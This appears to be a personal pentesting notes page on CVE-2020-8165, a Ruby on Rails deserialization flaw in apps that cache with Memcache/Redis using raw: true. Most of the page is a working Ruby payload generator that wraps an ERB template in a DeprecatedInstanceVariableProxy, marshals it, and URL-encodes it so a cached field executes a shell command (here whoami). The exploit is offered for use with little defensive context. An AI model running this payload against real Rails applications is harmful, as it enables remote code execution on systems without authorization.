xct's notes
Search…
Ruby

CVE-2020-8165

Exploitable in Rails < 5.2.4.3, Rails < 6.0.3.1 (install with apt install ruby-railties) when Memcache/Redis is used with raw: true. Let the following payload generate the data, then use it on a field that is going to Memcache/Redis:
1
require 'erb'
2
require 'rails/all'
3
4
remote_code = <<-RUBY
5
`whoami`
6
RUBY
7
8
erb = ERB.allocate
9
erb.instance_variable_set(:@src, remote_code)
10
erb.instance_variable_set(:@lineno, 0)
11
deprecation = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result)
12
exploit_data = Marshal.dump(deprecation)
13
puts URI.encode_www_form(payload: exploit_data)
Copied!

Interesting Reads

Last modified 5mo ago